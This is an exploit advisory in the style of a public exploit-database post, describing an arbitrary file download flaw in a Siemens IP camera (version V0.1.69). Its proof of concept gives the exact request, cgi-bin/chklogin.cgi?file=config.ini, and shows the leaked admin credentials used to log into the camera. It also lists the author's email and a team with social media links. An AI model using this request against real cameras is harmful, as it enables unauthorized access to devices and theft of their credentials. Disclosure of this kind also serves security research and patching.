#Exploit Title: Siemens IP Camera :: Arbitrary file download # Date: [14-september-2016] # Exploit Author: [vuppala.Dhanunjaya] # Vendor Homepage: [www.siemens.com] # Version: [V0.1.69] # Tested on: [Windows 10,ubuntu 14.04 LTS] # Email : vuppaladhani@gmail.com ======================================== TEAM ======================================== Harsha Vardhan (https://www.facebook.com/HarshaHere) Santosh Kumar (https://www.facebook.com/M4drob0t) Akhil Manikanth(https://www.facebook.com/IaMAkIlManIkAnTh) Manish Yadav (https://www.facebook.com/spikeymanish) Thankyou for the support ======================================== TECHNICAL DETAILS & POC ======================================== Target : Downloding the config file : cgi-bin/chklogin.cgi?file=config.ini this config.ini file contains the username nd password of the administration login account.admin.user_id=admin account.admin.password=admin account.admin.language=english using this login credentials we can get into the IPcam Thankyou